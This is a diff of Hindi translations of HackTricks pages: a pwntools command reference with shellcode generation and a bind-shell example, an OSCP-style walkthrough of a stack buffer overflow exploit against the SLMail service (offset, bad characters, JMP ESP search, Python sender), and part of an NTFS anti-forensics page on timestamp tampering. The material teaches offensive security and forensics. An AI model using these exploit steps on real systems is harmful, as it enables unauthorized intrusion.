||||
* जीडीबी चलाकर आउटपुट का डीबग शेलकोड का चयन करें
|
||||
* gdb चलाकर आउटपुट का डीबग शेलकोड चुनें
|
||||
|
||||
# **पॉन चेकसेक**
|
||||
# **Pwn checksec**
|
||||
|
||||
चेकसेक स्क्रिप्ट
|
||||
Checksec स्क्रिप्ट
|
||||
```
|
||||
pwn checksec <executable>
|
||||
```
|
||||
# हैक constgrep
|
||||
# Pwn constgrep
|
||||
|
||||
# हैक cyclic
|
||||
# Pwn cyclic
|
||||
|
||||
एक पैटर्न प्राप्त करें
|
||||
```
|
||||
|
@ -58,11 +59,11 @@ pwn debug --exec /bin/bash
|
|||
pwn debug --pid 1234
|
||||
pwn debug --process bash
|
||||
```
|
||||
**चुन सकते हैं:**
|
||||
**चयन कर सकते हैं:**
|
||||
|
||||
* कार्यकारी, नाम या पिडी संदर्भ (16,32,64,लिनक्स,विंडोज...)
|
||||
* निष्पादन के लिए gdbscript
|
||||
* सिसरूटपथ
|
||||
* कार्यकारी, नाम या पीआईडी संदर्भ (16,32,64,लिनक्स,विंडोज...)
|
||||
* निष्पादन करने के लिए gdbscript
|
||||
* सिसरूटपैथ
|
||||
|
||||
# Pwn disablenx
|
||||
|
||||
|
@ -72,11 +73,11 @@ pwn disablenx <filepath>
|
|||
```
|
||||
# Pwn disasm
|
||||
|
||||
हेक्स ओपकोड को डिसैसेम्बल करें
|
||||
हेक्स ओपकोड को disasemble करें
|
||||
```
|
||||
pwn disasm ffe4
|
||||
```
|
||||
**चुन सकते हैं:**
|
||||
**चयन कर सकते हैं:**
|
||||
|
||||
* संदर्भ (16,32,64,लिनक्स,विंडोज...)
|
||||
* मूल पता
|
||||
|
@ -88,7 +89,7 @@ pwn disasm ffe4
|
|||
```
|
||||
pwn elfdiff <file1> <file2>
|
||||
```
|
||||
# हेक्स पाना
|
||||
# हेक्स पान
|
||||
|
||||
हेक्साडेसिमल प्रतिनिधित्व प्राप्त करें
|
||||
```bash
|
||||
|
@ -112,7 +113,7 @@ pwn phd <file>
|
|||
|
||||
# Pwn shellcraft
|
||||
|
||||
शैलकोड प्राप्त करें
|
||||
शेलकोड प्राप्त करें
|
||||
```
|
||||
pwn shellcraft -l #List shellcodes
|
||||
pwn shellcraft -l amd #Shellcode with amd in the name
|
||||
|
@ -122,18 +123,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
|
|||
```
|
||||
**चयन करें:**
|
||||
|
||||
* शैलकोड और शैलकोड के लिए तार्किक
|
||||
* शेलकोड और शेलकोड के लिए तार्किक
|
||||
* आउट फ़ाइल
|
||||
* आउटपुट प्रारूप
|
||||
* डीबग (शैलकोड को dbg से जोड़ें)
|
||||
* डीबग (शेलकोड पर dbg जोड़ें)
|
||||
* पहले (कोड से पहले डीबग ट्रैप)
|
||||
* बाद
|
||||
* ओपकोड का उपयोग न करें (डिफ़ॉल्ट: नल और नई लाइन)
|
||||
* शैलकोड चलाएं
|
||||
* शेलकोड चलाएं
|
||||
* रंग/कोई रंग नहीं
|
||||
* सिसकॉल्स की सूची
|
||||
* संभावित शैलकोड की सूची
|
||||
* ELF को एक साझा पुस्तकालय के रूप में उत्पन्न करें
|
||||
* संभावित शेलकोड की सूची
|
||||
* ELF को साझा पुस्तकालय के रूप में उत्पन्न करें
|
||||
|
||||
# Pwn टेम्पलेट
|
||||
|
||||
|
@ -141,7 +142,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
|
|||
```
|
||||
pwn template
|
||||
```
|
||||
**चुन सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत
|
||||
**का चयन कर सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत
|
||||
|
||||
# Pwn अनहेक्स
|
||||
|
||||
|
@ -155,16 +156,17 @@ pwntools को अपडेट करने के लिए
|
|||
```
|
||||
pwn update
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,24 +1,25 @@
|
|||
# Windows Exploiting (Basic Guide - OSCP lvl)
|
||||
# Windows Exploiting (मूल गाइड - OSCP स्तर)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** PRs के माध्यम से [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## **SLMail सेवा स्थापित करना शुरू करें**
|
||||
## **SLMail सेवा को स्थापित करना शुरू करें**
|
||||
|
||||
## SLMail सेवा पुनः आरंभ करें
|
||||
## SLMail सेवा को पुनः आरंभ करें
|
||||
|
||||
हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने की आवश्यकता** होती है, तो आप विंडो कंसोल का उपयोग करके इसे कर सकते हैं:
|
||||
हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने** की आवश्यकता होती है, तो आप विंडोज कंसोल का उपयोग करके इसे कर सकते हैं:
|
||||
```
|
||||
net start slmail
|
||||
```
|
||||
|
@ -48,25 +49,25 @@ print "Could not connect to "+ip+":"+port
|
|||
```
|
||||
## **इम्यूनिटी डीबगर फ़ॉन्ट बदलें**
|
||||
|
||||
`विकल्प >> दिखावट >> फ़ॉन्ट >> बदलें(कंसोलस, बोल्ड, 9) >> ठीक है`
|
||||
जाएं `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
|
||||
|
||||
## **प्रक्रिया को इम्यूनिटी डीबगर से जोड़ें:**
|
||||
|
||||
**फ़ाइल --> जोड़ें**
|
||||
**File --> Attach**
|
||||
|
||||
![](<../.gitbook/assets/image (24) (1) (1).png>)
|
||||
|
||||
**और स्टार्ट बटन दबाएं**
|
||||
**और START बटन दबाएं**
|
||||
|
||||
## **एक्सप्लॉइट भेजें और जांचें कि क्या ईआईपी प्रभावित है:**
|
||||
## **एक्सप्लॉइट भेजें और जांचें कि क्या EIP प्रभावित है:**
|
||||
|
||||
![](<../.gitbook/assets/image (25) (1) (1).png>)
|
||||
|
||||
हर बार जब आप सेवा को तोड़ते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि आपको इसे पुनः प्रारंभ करना चाहिए।
|
||||
हर बार जब आप सेवा को ब्रेक करते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि इसे पुनः आरंभ करना चाहिए।
|
||||
|
||||
## ईआईपी को संशोधित करने के लिए एक पैटर्न बनाएं
|
||||
## EIP को संशोधित करने के लिए एक पैटर्न बनाएं
|
||||
|
||||
पैटर्न उस बफर के बराबर होना चाहिए जिसका आपने पहले सेवा को तोड़ने के लिए उपयोग किया था।
|
||||
पैटर्न उसी बफर के बड़ा होना चाहिए जिसका आपने पिछले में सेवा को तोड़ने के लिए उपयोग किया था।
|
||||
|
||||
![](<../.gitbook/assets/image (26) (1) (1).png>)
|
||||
```
|
||||
|
@ -86,7 +87,7 @@ print "Could not connect to "+ip+":"+port
|
|||
```
|
||||
लगता है **हम बफर के ऑफसेट 2606 में EIP को संशोधित कर सकते हैं**।
|
||||
|
||||
इसे जांचने के लिए एक्सप्लॉइट के बफर को संशोधित करें:
|
||||
एक्सप्लॉइट के बफर को संशोधित करने की जांच करें:
|
||||
```
|
||||
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
|
||||
```
|
||||
|
@ -98,9 +99,9 @@ buffer = 'A'*2606 + 'BBBB' + 'CCCC'
|
|||
|
||||
लगता है काम कर रहा है।
|
||||
|
||||
## स्टैक के अंदर शेलकोड स्थान की जांच करें
|
||||
## स्टैक के अंदर शैलकोड स्थान की जांच करें
|
||||
|
||||
600B किसी भी शक्तिशाली शेलकोड के लिए पर्याप्त होना चाहिए।
|
||||
600B किसी भी शक्तिशाली शैलकोड के लिए पर्याप्त होना चाहिए।
|
||||
|
||||
चलिए बफर बदलते हैं:
|
||||
```
|
||||
|
@ -114,9 +115,9 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600
|
|||
|
||||
आप देख सकते हैं कि जब सुरक्षा दोष तक पहुंचा जाता है, तो EBP शेलकोड की ओर प्वाइंट कर रहा है और हमें यहां एक शेलकोड स्थानित करने के लिए बहुत जगह है।
|
||||
|
||||
इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B** है। पर्याप्त।
|
||||
इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B तक** है। पर्याप्त।
|
||||
|
||||
## बुरा वर्णों के लिए जांच करें
|
||||
## बुरे वर्णों के लिए जांच करें
|
||||
|
||||
फिर से बफर बदलें:
|
||||
```
|
||||
|
@ -140,13 +141,13 @@ badchars = (
|
|||
)
|
||||
buffer = 'A'*2606 + 'BBBB' + badchars
|
||||
```
|
||||
बैडचार्स 0x01 से शुरू होता है क्योंकि 0x00 लगभग हमेशा बुरा होता है।
|
||||
बैडचार्स 0x01 से शुरू होते हैं क्योंकि 0x00 लगभग हमेशा बेकार होता है।
|
||||
|
||||
इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं:।
|
||||
इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं।
|
||||
|
||||
उदाहरण के लिए:
|
||||
|
||||
इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि मेमोरी में कुछ भी सहेजा नहीं गया है क्योंकि वर्ण 0x09)।
|
||||
इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि वर्ण 0x09 मेमोरी में कुछ भी सहेजा नहीं गया है)।
|
||||
|
||||
![](<../.gitbook/assets/image (33) (1).png>)
|
||||
|
||||
|
@ -160,7 +161,7 @@ buffer = 'A'*2606 + 'BBBB' + badchars
|
|||
```
|
||||
!mona modules #Get protections, look for all false except last one (Dll of SO)
|
||||
```
|
||||
आपको **मेमोरी मैप्स की सूची** बनानी है। कुछ DLL खोजें जिसमें:
|
||||
आपको **मेमोरी मैप्स की सूची** बनानी होगी। कुछ DLL खोजें जिसमें:
|
||||
|
||||
* **Rebase: False**
|
||||
* **SafeSEH: False**
|
||||
|
@ -170,12 +171,12 @@ buffer = 'A'*2606 + 'BBBB' + badchars
|
|||
|
||||
![](<../.gitbook/assets/image (35) (1).png>)
|
||||
|
||||
अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसके लिए निम्नलिखित को चलाएं:
|
||||
अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसे करने के लिए निम्नलिखित को चलाएं:
|
||||
```
|
||||
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
|
||||
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
|
||||
```
|
||||
**फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी चर न हो:**
|
||||
**फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी वर्ण (badchar) न हो:**
|
||||
|
||||
![](<../.gitbook/assets/image (36) (1).png>)
|
||||
|
||||
|
@ -238,7 +239,7 @@ except:
|
|||
print "Could not connect to "+ip+":"+port
|
||||
```
|
||||
{% hint style="warning" %}
|
||||
ऐसे शेलकोड होते हैं जो अपने आप को **अधिलेखित** कर देते हैं, इसलिए हमेशा शेलकोड के पहले कुछ NOPs जोड़ना महत्वपूर्ण है
|
||||
ऐसे शेलकोड हैं जो अपने आप को **अधिलिखित** कर देंगे, इसलिए हमेशा शेलकोड से पहले कुछ NOPs जोड़ना महत्वपूर्ण है
|
||||
{% endhint %}
|
||||
|
||||
## शेलकोड को बेहतर बनाना
|
||||
|
@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port
|
|||
```
|
||||
EXITFUNC=thread -e x86/shikata_ga_nai
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,143 +1,142 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
# समय-चिह्न
|
||||
# टाइमस्टैम्प
|
||||
|
||||
किसी हमलावर को **फ़ाइलों के समय-चिह्नों को बदलने** में दिलचस्पी हो सकती है।\
|
||||
एमएफटी में समय-चिह्न ढूंढना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
|
||||
एक हमलावता **फ़ाइलों के टाइमस्टैम्प को बदलने** में रुचि रख सकता है।\
|
||||
एमएफटी में टाइमस्टैम्प्स को खोजना संभव है जो विशेषता `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
|
||||
|
||||
दोनों गुणों में 4 समय-चिह्न होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)।
|
||||
दोनों विशेषताएँ 4 टाइमस्टैम्प्स रखती हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)।
|
||||
|
||||
**Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं।
|
||||
|
||||
## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल
|
||||
|
||||
यह उपकरण **`$STANDARD_INFORMATION`** के भीतर समय-चिह्न जानकारी को **संशोधित करता है** **लेकिन** **`$FILE_NAME`** के भीतर की जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
|
||||
यह टूल **`$STANDARD_INFORMATION`** के भीतर टाइमस्टैम्प जानकारी को **संशोधित** करता है **लेकिन** **`$FILE_NAME`** के भीतर जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
|
||||
|
||||
## Usnjrnl
|
||||
|
||||
**USN Journal** (अपडेट सीक्वेंस नंबर जर्नल) NTFS (Windows NT फ़ाइल सिस्टम) का एक विशेषता है जो वॉल्यूम परिवर्तनों का पता लगाता है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) उपकरण इन परिवर्तनों का परीक्षण करने की अनुमति देता है।
|
||||
**USN जर्नल** (अपडेट सीक्वेंस नंबर जर्नल) एनटीएफएस (विंडोज एनटी एफएस फ़ाइल सिस्टम) की एक विशेषता है जो वॉल्यूम परिवर्तनों का पता रखती है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) टूल इन परिवर्तनों की जांच करने की अनुमति देता है।
|
||||
|
||||
![](<../../.gitbook/assets/image (449).png>)
|
||||
|
||||
पिछली छवि उपकरण द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में।
|
||||
पिछली छवि टूल द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में।
|
||||
|
||||
## $LogFile
|
||||
|
||||
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [व्राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एक NTFS फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है।
|
||||
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एनटीएफएस फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है।
|
||||
|
||||
![](<../../.gitbook/assets/image (450).png>)
|
||||
|
||||
फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**।
|
||||
|
||||
इसी उपकरण का उपयोग करके समय-चिह्नों को **किस समय संशोधित किया गया था** की पहचान करना संभव है:
|
||||
इसी उपकरण का उपयोग करके टाइमस्टैम्प्स को **किस समय संशोधित किया गया था** की पहचान करना संभव है:
|
||||
|
||||
![](<../../.gitbook/assets/image (451).png>)
|
||||
|
||||
* CTIME: फ़ाइल का निर्माण समय
|
||||
* ATIME: फ़ाइल का संशोधन समय
|
||||
* MTIME: फ़ाइल का MFT रजिस्ट्री संशोधन
|
||||
* MTIME: फ़ाइल का एमएफटी रजिस्ट्री संशोधन
|
||||
* RTIME: फ़ाइल का पहुंच समय
|
||||
|
||||
## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना
|
||||
|
||||
संदेहास्पद संशोधित फ़ाइलों की पहचान करने के लिए एक और तरीका होगा कि दोनों गुणों पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ**।
|
||||
संदेहास्पद संशोधित फ़ाइलों की पहचान करने का एक और तरीका होगा कि दोनों विशेषताओं पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ**।
|
||||
|
||||
## नैनोसेकंड
|
||||
|
||||
**NTFS** समय-चिह्नों का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे समय-चिह्न वाली फ़ाइलें खोजना बहुत संदेहास्पद है।
|
||||
**एनटीएफएस** टाइमस्टैम्प्स का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे टाइमस्टैम्प्स वाली फ़ाइलें खोजना बहुत संदेहास्पद है**।
|
||||
|
||||
## SetMace - एंटी-फोरेंसिक टूल
|
||||
|
||||
यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए लाइव ओएस की आवश्यकता है।
|
||||
यह उपकरण दोनों विशेषताएँ `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है।
|
||||
|
||||
# डेटा छुपाना
|
||||
|
||||
NFTS एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छिपी" जगह में डेटा छुपाना संभव है।
|
||||
